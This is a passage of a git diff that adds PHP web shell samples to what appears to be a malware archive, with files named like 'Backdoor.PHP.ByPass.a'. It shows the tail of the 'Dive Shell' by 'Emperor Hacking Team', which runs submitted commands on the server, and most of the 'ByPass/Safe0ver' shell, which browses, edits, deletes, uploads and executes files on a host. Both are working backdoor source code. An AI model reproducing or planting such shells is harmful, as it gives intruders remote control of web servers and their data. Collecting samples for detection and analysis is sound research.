2 => array('pipe', 'w')),
|
||||||
|
$io);
|
||||||
|
|
||||||
|
|
||||||
|
while (!feof($io[1])) {
|
||||||
|
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
|
||||||
|
ENT_COMPAT, 'UTF-8');
|
||||||
|
}
|
||||||
|
|
||||||
|
while (!feof($io[2])) {
|
||||||
|
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
|
||||||
|
ENT_COMPAT, 'UTF-8');
|
||||||
|
}
|
||||||
|
|
||||||
|
fclose($io[1]);
|
||||||
|
fclose($io[2]);
|
||||||
|
proc_close($p);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
if (empty($_SESSION['history'])) {
|
||||||
|
$js_command_hist = '""';
|
||||||
|
} else {
|
||||||
|
$escaped = array_map('addslashes', $_SESSION['history']);
|
||||||
|
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
header('Content-Type: text/html; charset=UTF-8');
|
||||||
|
|
||||||
|
echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
|
||||||
|
?>
|
||||||
|
|
||||||
|
<head>
|
||||||
|
<title>Dive Shell - Emperor Hacking Team</title>
|
||||||
|
<link rel="stylesheet" href="Simshell.css" type="text/css" />
|
||||||
|
|
||||||
|
<script type="text/javascript" language="JavaScript">
|
||||||
|
var current_line = 0;
|
||||||
|
var command_hist = new Array(<?php echo $js_command_hist ?>);
|
||||||
|
var last = 0;
|
||||||
|
|
||||||
|
function key(e) {
|
||||||
|
if (!e) var e = window.event;
|
||||||
|
|
||||||
|
if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
||||||
|
command_hist[current_line] = document.shell.command.value;
|
||||||
|
current_line++;
|
||||||
|
document.shell.command.value = command_hist[current_line];
|
||||||
|
}
|
||||||
|
|
||||||
|
if (e.keyCode == 40 && current_line > 0) {
|
||||||
|
command_hist[current_line] = document.shell.command.value;
|
||||||
|
current_line--;
|
||||||
|
document.shell.command.value = command_hist[current_line];
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
function init() {
|
||||||
|
document.shell.setAttribute("autocomplete", "off");
|
||||||
|
document.shell.output.scrollTop = document.shell.output.scrollHeight;
|
||||||
|
document.shell.command.focus();
|
||||||
|
}
|
||||||
|
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
|
||||||
|
<body onload="init()" style="color: #00FF00; background-color: #000000">
|
||||||
|
|
||||||
|
<span style="background-color: #FFFFFF">
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
</span>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<p><font color="#FF0000"><span style="background-color: #000000"> Directory: </span> <code>
|
||||||
|
<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
|
||||||
|
</font></p>
|
||||||
|
|
||||||
|
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
|
||||||
|
<div style="width: 989; height: 456">
|
||||||
|
<p align="center"><b>
|
||||||
|
<font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
|
||||||
|
onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
|
||||||
|
<input type="submit" value="Submit" /> <font color="#0000FF">
|
||||||
|
</font>
|
||||||
|
<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
|
||||||
|
<?php
|
||||||
|
$lines = substr_count($_SESSION['output'], "\n");
|
||||||
|
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
|
||||||
|
echo rtrim($padding . $_SESSION['output']);
|
||||||
|
?>
|
||||||
|
</textarea> </p>
|
||||||
|
<p class="prompt" align="center">
|
||||||
|
<b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b>
|
||||||
|
<input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
|
||||||
|
<p class="prompt" align="center">
|
||||||
|
<b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
|
||||||
|
<p class="prompt" align="center">
|
||||||
|
<font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
|
||||||
|
</font></p>
|
||||||
|
</div>
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
<p class="prompt" align="center">
|
||||||
|
<b><font color="#000000"> </font><font color="#000000" size="2"> </font>
|
||||||
|
</b></p>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
</html>
|
2062
PHP/Backdoor.PHP.Agent.z
Normal file
2062
PHP/Backdoor.PHP.Agent.z
Normal file
File diff suppressed because it is too large
Load Diff
922
PHP/Backdoor.PHP.ByPass.a
Normal file
922
PHP/Backdoor.PHP.ByPass.a
Normal file
@ -0,0 +1,922 @@
|
|||||||
|
<?php
|
||||||
|
/*
|
||||||
|
*****************************************************************************************
|
||||||
|
* ByPass PHP SHELL *
|
||||||
|
* WWW.php-shell.org *
|
||||||
|
*****************************************************************************************
|
||||||
|
*/
|
||||||
|
|
||||||
|
$SFileName=$PHP_SELF;
|
||||||
|
|
||||||
|
error_reporting(0);
|
||||||
|
$PHPVer=phpversion();
|
||||||
|
$isGoodver=(intval($PHPVer[0])>=4);
|
||||||
|
$scriptTitle = "Safe0ver";
|
||||||
|
$scriptident = "<a href =http://www.WWW.php-shell.org>"."$scriptTitle By TDT - www.WWW.php-shell.org</a>";
|
||||||
|
|
||||||
|
$urlAdd = "";
|
||||||
|
$formAdd = "";
|
||||||
|
|
||||||
|
function walkArray($array){
|
||||||
|
while (list($key, $data) = each($array))
|
||||||
|
if (is_array($data)) { walkArray($data); }
|
||||||
|
else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (isset($_PUT)) walkArray($_PUT);
|
||||||
|
if (isset($_GET)) walkArray($_GET);
|
||||||
|
if (isset($_POST)) walkArray($_POST);
|
||||||
|
|
||||||
|
|
||||||
|
$pos = strpos($urlAdd, "s=r");
|
||||||
|
if (strval($pos) != "") {
|
||||||
|
$urlAdd= substr($urlAdd, 0, $pos);
|
||||||
|
}
|
||||||
|
|
||||||
|
$urlAdd .= "&s=r&";
|
||||||
|
|
||||||
|
if (empty($Pmax))
|
||||||
|
$Pmax = 125;
|
||||||
|
if (empty($Pidx))
|
||||||
|
$Pidx = 0;
|
||||||
|
|
||||||
|
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
|
||||||
|
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
|
||||||
|
|
||||||
|
$scriptdate = "7 Subat 2007";
|
||||||
|
$scriptver = "TDT Version";
|
||||||
|
$LOCAL_IMAGE_DIR = "img";
|
||||||
|
$REMOTE_IMAGE_URL = "img";
|
||||||
|
$img = array(
|
||||||
|
"Edit" => "edit.gif",
|
||||||
|
"Download" => "download.gif",
|
||||||
|
"Upload" => "upload.gif",
|
||||||
|
"Delete" => "delete.gif",
|
||||||
|
"View" => "view.gif",
|
||||||
|
"Rename" => "rename.gif",
|
||||||
|
"Move" => "move.gif",
|
||||||
|
"Copy" => "copy.gif",
|
||||||
|
"Execute" => "exec.gif"
|
||||||
|
);
|
||||||
|
|
||||||
|
while (list($id, $im)=each($img))
|
||||||
|
if (file_exists("$LOCAL_IMAGE_DIR/$im"))
|
||||||
|
$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
|
||||||
|
else
|
||||||
|
$img[$id] = "[$id]";
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) {
|
||||||
|
setcookie("noauth","");
|
||||||
|
Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\"");
|
||||||
|
Header( "HTTP/1.0 401 Unauthorized");
|
||||||
|
echo "Your username or password is incorrect";
|
||||||
|
exit ;
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
function buildUrl($display, $url) {
|
||||||
|
global $urlAdd;
|
||||||
|
$url = $SFileName . "?$urlAdd$url";
|
||||||
|
return "<a href=\"$url\">$display</a>";
|
||||||
|
}
|
||||||
|
|
||||||
|
function sp($mp) {
|
||||||
|
for ( $i = 0; $i < $mp; $i++ )
|
||||||
|
$ret .= " ";
|
||||||
|
return $ret;
|
||||||
|
}
|
||||||
|
|
||||||
|
function spacetonbsp($instr) { return str_replace(" ", " ", $instr); }
|
||||||
|
|
||||||
|
function Mydeldir($Fdir) {
|
||||||
|
if (is_dir($Fdir)) {
|
||||||
|
$Fh=@opendir($Fdir);
|
||||||
|
while ($Fbuf = readdir($Fh))
|
||||||
|
if (($Fbuf != ".") && ($Fbuf != ".."))
|
||||||
|
Mydeldir("$Fdir/$Fbuf");
|
||||||
|
@closedir($Fh);
|
||||||
|
return rmdir($Fdir);
|
||||||
|
} else {
|
||||||
|
return unlink($Fdir);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function arrval ($array) {
|
||||||
|
list($key, $data) = $array;
|
||||||
|
return $data;
|
||||||
|
}
|
||||||
|
|
||||||
|
function formatsize($insize) {
|
||||||
|
$size = $insize;
|
||||||
|
$add = "B";
|
||||||
|
if ($size > 1024) {
|
||||||
|
$size = intval(intval($size) / 1.024)/1000;
|
||||||
|
$add = "KB";
|
||||||
|
}
|
||||||
|
if ($size > 1024) {
|
||||||
|
$size = intval(intval($size) / 1.024)/1000;
|
||||||
|
$add = "MB";
|
||||||
|
}
|
||||||
|
if ($size > 1024) {
|
||||||
|
$size = intval(intval($size) / 1.024)/1000;
|
||||||
|
$add = "GB";
|
||||||
|
}
|
||||||
|
if ($size > 1024) {
|
||||||
|
$size = intval(intval($size) / 1.024)/1000;
|
||||||
|
$add = "TB";
|
||||||
|
}
|
||||||
|
return "$size $add";
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($cmd != "downl") {
|
||||||
|
?>
|
||||||
|
|
||||||
|
<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> -->
|
||||||
|
<HTML>
|
||||||
|
<HEAD>
|
||||||
|
<STYLE>
|
||||||
|
<!--
|
||||||
|
A{ text-decoration:none; color:navy; font-size: 12px }
|
||||||
|
body {
|
||||||
|
font-size: 12px;
|
||||||
|
font-family: arial, helvetica;
|
||||||
|
scrollbar-width: 5;
|
||||||
|
scrollbar-height: 5;
|
||||||
|
scrollbar-face-color: white;
|
||||||
|
scrollbar-shadow-color: silver;
|
||||||
|
scrollbar-highlight-color: white;
|
||||||
|
scrollbar-3dlight-color:silver;
|
||||||
|
scrollbar-darkshadow-color: silver;
|
||||||
|
scrollbar-track-color: white;
|
||||||
|
scrollbar-arrow-color: black;
|
||||||
|
background-color: #CCCCCC;
|
||||||
|
}
|
||||||
|
Table { font-size: 12px; }
|
||||||
|
TR{ font-size: 12px; }
|
||||||
|
TD{
|
||||||
|
font-size: 12px;
|
||||||
|
font-family: arial, helvetical;
|
||||||
|
BORDER-LEFT: black 0px solid;
|
||||||
|
BORDER-RIGHT: black 0px solid;
|
||||||
|
BORDER-TOP: black 0px solid;
|
||||||
|
BORDER-BOTTOM: black 0px solid;
|
||||||
|
COLOR: black;
|
||||||
|
background: #CCCCCC;
|
||||||
|
}
|
||||||
|
.border{ BORDER-LEFT: black 1px solid;
|
||||||
|
BORDER-RIGHT: black 1px solid;
|
||||||
|
BORDER-TOP: black 1px solid;
|
||||||
|
BORDER-BOTTOM: black 1px solid;
|
||||||
|
}
|
||||||
|
.none { BORDER-LEFT: black 0px solid;
|
||||||
|
BORDER-RIGHT: black 0px solid;
|
||||||
|
BORDER-TOP: black 0px solid;
|
||||||
|
BORDER-BOTTOM: black 0px solid;
|
||||||
|
}
|
||||||
|
.inputtext {
|
||||||
|
background-color: #EFEFEF;
|
||||||
|
font-family: arial, helvetica;
|
||||||
|
border: 1px solid #000000;
|
||||||
|
height: 20;
|
||||||
|
}
|
||||||
|
.lighttd { background: #F8F8F8;
|
||||||
|
}
|
||||||
|
.darktd { background: #CCCCCC;
|
||||||
|
}
|
||||||
|
input { font-family: arial, helvetica;
|
||||||
|
}
|
||||||
|
.inputbutton {
|
||||||
|
background-color: #CCCCCC;
|
||||||
|
border: 1px solid #000000;
|
||||||
|
border-width: 1px;
|
||||||
|
height: 20;
|
||||||
|
}
|
||||||
|
.inputtextarea {
|
||||||
|
background-color: #CCCCCC;
|
||||||
|
border: 1px solid #000000;
|
||||||
|
scrollbar-width: 5;
|
||||||
|
scrollbar-height: 5;
|
||||||
|
scrollbar-face-color: #EFEFEF;
|
||||||
|
scrollbar-shadow-color: silver;
|
||||||
|
scrollbar-highlight-color: #EFEFEF;
|
||||||
|
scrollbar-3dlight-color:silver;
|
||||||
|
scrollbar-darkshadow-color: silver;
|
||||||
|
scrollbar-track-color: #EFEFEF;
|
||||||
|
scrollbar-arrow-color: black;
|
||||||
|
}
|
||||||
|
.top { BORDER-TOP: black 1px solid; }
|
||||||
|
.textin { BORDER-LEFT: silver 1px solid;
|
||||||
|
BORDER-RIGHT: silver 1px solid;
|
||||||
|
BORDER-TOP: silver 1px solid;
|
||||||
|
BORDER-BOTTOM: silver 1px solid;
|
||||||
|
width: 99%; font-size: 12px; font-weight: bold; color: Black;
|
||||||
|
}
|
||||||
|
.notop { BORDER-TOP: black 0px solid; }
|
||||||
|
.bottom { BORDER-BOTTOM: black 1px solid; }
|
||||||
|
.nobottom { BORDER-BOTTOM: black 0px solid; }
|
||||||
|
.left { BORDER-LEFT: black 1px solid; }
|
||||||
|
.noleft { BORDER-LEFT: black 0px solid; }
|
||||||
|
.right { BORDER-RIGHT: black 1px solid; }
|
||||||
|
.noright { BORDER-RIGHT: black 0px solid; }
|
||||||
|
.silver{ BACKGROUND: #CCCCCC; }
|
||||||
|
body,td,th {
|
||||||
|
color: #660000;
|
||||||
|
}
|
||||||
|
a:link {
|
||||||
|
color: #000000;
|
||||||
|
text-decoration: none;
|
||||||
|
}
|
||||||
|
a:hover {
|
||||||
|
color: #00FF00;
|
||||||
|
text-decoration: none;
|
||||||
|
}
|
||||||
|
a:active {
|
||||||
|
color: #666666;
|
||||||
|
text-decoration: none;
|
||||||
|
}
|
||||||
|
a:visited {
|
||||||
|
text-decoration: none;
|
||||||
|
}
|
||||||
|
.style5 {
|
||||||
|
color: #660000;
|
||||||
|
font-weight: bold;
|
||||||
|
}
|
||||||
|
-->
|
||||||
|
</STYLE>
|
||||||
|
<TITLE><?php echo $SFileName ?></TITLE>
|
||||||
|
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
|
||||||
|
<body topmargin="0" leftmargin="0">
|
||||||
|
<div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
|
||||||
|
<table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" class="silver border"><center>
|
||||||
|
<strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
|
||||||
|
</center></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<table width=100% height="100%" NOWRAP border="0">
|
||||||
|
<tr NOWRAP>
|
||||||
|
<td width="100%" NOWRAP><br>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
}
|
||||||
|
|
||||||
|
if ( $cmd=="dir" ) {
|
||||||
|
$h=@opendir($dir);
|
||||||
|
if ($h == false) {
|
||||||
|
echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
|
||||||
|
Klas?r Listelenemiyor!L?tfen Bypass B?l?m?n? Deneyin.<br>".sp(3)."\n
|
||||||
|
Script Gecisi Tamamlayamadi!
|
||||||
|
<br><br>".sp(3)."\n
|
||||||
|
Klas?re Girmek Icin yetkiniz Olduguna emin Olunuz...
|
||||||
|
<br><br></font>\n\n\n\n";
|
||||||
|
}
|
||||||
|
if (function_exists('realpath')) {
|
||||||
|
$partdir = realpath($dir);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$partdir = $dir;
|
||||||
|
}
|
||||||
|
if (strlen($partdir) >= 100) {
|
||||||
|
$partdir = substr($partdir, -100);
|
||||||
|
$pos = strpos($partdir, "/");
|
||||||
|
if (strval($pos) != "") {
|
||||||
|
$partdir = "<-- ...".substr($partdir, $pos);
|
||||||
|
}
|
||||||
|
$partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
|
||||||
|
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
|
||||||
|
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
|
||||||
|
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
|
||||||
|
<tr>
|
||||||
|
<td width="100%" class="silver border">
|
||||||
|
<center> Safe0ver-Server File Browser... </center>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<br>
|
||||||
|
<table width="100%" border="0" cellpadding="0" cellspacing="0">
|
||||||
|
<tr>
|
||||||
|
<td class="border nobottom noright">
|
||||||
|
Listeliyor:
|
||||||
|
</td>
|
||||||
|
<td width="100%" class="border nobottom noleft">
|
||||||
|
<table width="100%" border="0" cellpadding="1" cellspacing="0">
|
||||||
|
<tr>
|
||||||
|
<td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
|
||||||
|
<td NOWRAP><center> <a href="javascript: urlform.submit();"><b>GiT<b></a> <center></td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<!-- </form> -->
|
||||||
|
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
|
||||||
|
<tr>
|
||||||
|
<td width="100%" NOWRAP class="silver border">
|
||||||
|
Dosya Adi
|
||||||
|
</td>
|
||||||
|
<td NOWRAP class="silver border noleft">
|
||||||
|
Yapilabilecekler
|
||||||
|
</td>
|
||||||
|
<td NOWRAP class="silver border noleft">
|
||||||
|
Boyut
|
||||||
|
</td>
|
||||||
|
<td width=1 NOWRAP class="silver border noleft">
|
||||||
|
Yetkiler
|
||||||
|
</td>
|
||||||
|
<td NOWRAP class="silver border noleft">
|
||||||
|
Son D?zenleme
|
||||||
|
</td>
|
||||||
|
<tr>
|
||||||
|
<?php
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
$dirn = array();
|
||||||
|
$filen = array();
|
||||||
|
$filesizes = 0;
|
||||||
|
while ($buf = readdir($h)) {
|
||||||
|
if (is_dir("$dir/$buf"))
|
||||||
|
$dirn[] = $buf;
|
||||||
|
else
|
||||||
|
$filen[] = $buf;
|
||||||
|
}
|
||||||
|
$dirno = count($dirn) + 1;
|
||||||
|
$fileno = count($filen) + 1;
|
||||||
|
|
||||||
|
function mycmp($a, $b){
|
||||||
|
if ($a == $b) return 0;
|
||||||
|
return (strtolower($a) < strtolower($b)) ? -1 : 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (function_exists("usort")) {
|
||||||
|
usort($dirn, "mycmp");
|
||||||
|
usort($filen, "mycmp");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
sort ($dirn);
|
||||||
|
sort ($filen);
|
||||||
|
}
|
||||||
|
reset ($dirn);
|
||||||
|
reset ($filen);
|
||||||
|
if (function_exists('array_merge')) {
|
||||||
|
$filelist = array_merge ($dirn, $filen);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$filelist = $dirn + $filen;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
if ( count($filelist)-1 > $Pmax ) {
|
||||||
|
$from = $Pidx * $Pmax;
|
||||||
|
$to = ($Pidx + 1) * $Pmax-1;
|
||||||
|
if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
|
||||||
|
$to = count($filelist) - 1;
|
||||||
|
if ($to > count($filelist)-1)
|
||||||
|
$to = count($filelist)-1;
|
||||||
|
$Dcontents = array();
|
||||||
|
For ($Fi = $from; $Fi <= $to; $Fi++) {
|
||||||
|
$Dcontents[] = $filelist[$Fi];
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$Dcontents = $filelist;
|
||||||
|
}
|
||||||
|
|
||||||
|
$tdcolors = array("lighttd", "darktd");
|
||||||
|
|
||||||
|
while (list ($key, $file) = each ($Dcontents)) {
|
||||||
|
if (!$tdcolor=arrval(each($tdcolors))) {
|
||||||
|
reset($tdcolors);
|
||||||
|
$tdcolor = arrval(each($tdcolors)); }
|
||||||
|
|
||||||
|
if (is_dir("$dir/$file")) {
|
||||||
|
|
||||||
|
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
|
||||||
|
|
||||||
|
echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
|
||||||
|
|
||||||
|
if ( ($file != ".") && ($file != "..") )
|
||||||
|
echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
|
||||||
|
|
||||||
|
if ( ($file != ".") && ($file != "..") )
|
||||||
|
echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
|
||||||
|
|
||||||
|
echo " </center></td>\n";
|
||||||
|
|
||||||
|
echo "<td NOWRAP class=\"top right $tdcolor\"> </td>\n";
|
||||||
|
|
||||||
|
echo "<td NOWRAP class=\"top right $tdcolor\"> \n";
|
||||||
|
echo "<strong>D</strong>";
|
||||||
|
if ( @is_readable("$dir/$file") ) {
|
||||||
|
echo "<strong>R</strong>";
|
||||||
|
}
|
||||||
|
if (function_exists('is_writeable')) {
|
||||||
|
if ( @is_writeable("$dir/$file") ) {
|
||||||
|
echo "<strong>W</stong>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo "<strong>(W)</stong>";
|
||||||
|
}
|
||||||
|
if ( @is_executable("$dir/$file") ) {
|
||||||
|
echo "<Strong>X<strong>";
|
||||||
|
}
|
||||||
|
echo " </td>\n";
|
||||||
|
|
||||||
|
echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
|
||||||
|
echo " ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))." ";
|
||||||
|
echo "</td>";
|
||||||
|
echo "</tr>\n";
|
||||||
|
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
|
||||||
|
if ( @is_readable("$dir/$file") )
|
||||||
|
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
|
||||||
|
else
|
||||||
|
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
|
||||||
|
|
||||||
|
echo "<td NOWRAP class=\"top right $tdcolor\"><center> \n";
|
||||||
|
|
||||||
|
echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
|
||||||
|
|
||||||
|
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
|
||||||
|
echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
|
||||||
|
|
||||||
|
echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
|
||||||
|
|
||||||
|
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
|
||||||
|
echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
|
||||||
|
|
||||||
|
echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
|
||||||
|
|
||||||
|
echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
|
||||||
|
|
||||||
|
if ( @is_executable("$dir/$file") )
|
||||||
|
echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
|
||||||
|
|
||||||
|
echo sp(2)."</center></td>\n";
|
||||||
|
|
||||||
|
echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
|
||||||
|
$size = @filesize("$dir/$file");
|
||||||
|
If ($size != false) {
|
||||||
|
$filesizes += $size;
|
||||||
|
echo " <strong>".formatsize($size)."<strong>";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
echo " <strong>0 B<strong>";
|
||||||
|
echo " </td>\n";
|
||||||
|
|
||||||
|
|
||||||
|
echo "<td NOWRAP class=\"top right $tdcolor\"> \n";
|
||||||
|
|
||||||
|
if ( @is_readable("$dir/$file") )
|
||||||
|
echo "<strong>R</strong>";
|
||||||
|
if ( @is_writeable("$dir/$file") )
|
||||||
|
echo "<strong>W</stong>";
|
||||||
|
if ( @is_executable("$dir/$file") )
|
||||||
|
echo "<Strong>X<strong>";
|
||||||
|
if (function_exists('is_uploaded_file')){
|
||||||
|
if ( @is_uploaded_file("$dir/$file") )
|
||||||
|
echo "<Strong>U<strong>";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo "<Strong>(U)<strong>";
|
||||||
|
}
|
||||||
|
echo " </td>\n";
|
||||||
|
|
||||||
|
echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
|
||||||
|
echo " ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))." ";
|
||||||
|
echo "</td>";
|
||||||
|
echo "</tr>\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
|
||||||
|
echo " ".@count ($dirn)." Klas?r, ".@count ($filen)." Dosya \n";
|
||||||
|
echo "</td><td NOWRAP class=\"silver border noleft\">\n";
|
||||||
|
echo " Toplam Dosya Boyutu: ".formatsize($filesizes)." <td></tr>\n";
|
||||||
|
|
||||||
|
function printpagelink($a, $b, $link = ""){
|
||||||
|
if ($link != "")
|
||||||
|
echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
|
||||||
|
else
|
||||||
|
echo "<b>| $a - $b |</b>";
|
||||||
|
}
|
||||||
|
|
||||||
|
if ( count($filelist)-1 > $Pmax ) {
|
||||||
|
echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
|
||||||
|
$Fi = 0;
|
||||||
|
while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
|
||||||
|
$from = $Fi*$Pmax;
|
||||||
|
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
|
||||||
|
$to = ($Fi + 1) * $Pmax - 1;
|
||||||
|
if ($Fi == $Pidx)
|
||||||
|
$link="";
|
||||||
|
else
|
||||||
|
$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
|
||||||
|
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
|
||||||
|
echo " ";
|
||||||
|
$Fi++;
|
||||||
|
}
|
||||||
|
$from = $Fi*$Pmax;
|
||||||
|
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
|
||||||
|
$to = count($filelist)-1;
|
||||||
|
if ($Fi == $Pidx)
|
||||||
|
$link="";
|
||||||
|
else
|
||||||
|
$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
|
||||||
|
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
|
||||||
|
|
||||||
|
|
||||||
|
echo "</center></td></tr></table></td></tr>";
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
echo "</table>\n<br><table NOWRAP>";
|
||||||
|
|
||||||
|
if ($isGoodver) {
|
||||||
|
echo "<tr><td class=\"silver border\"> <strong>PHP Versiyonu: </strong> </td><td> $PHPVer </td></tr>\n";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo "<tr><td class=\"silver border\"> <strong>Server's PHP Version: </strong> </td><td> $PHPVer (Some functions might be unavailable...) </td></tr>\n";
|
||||||
|
}
|
||||||
|
|
||||||
|
echo "<tr><td class=\"silver border\"> <strong>Diger Islemler: </strong> </td>\n";
|
||||||
|
echo "<td> <b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
|
||||||
|
buildUrl( "| Yeni Klas?r |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
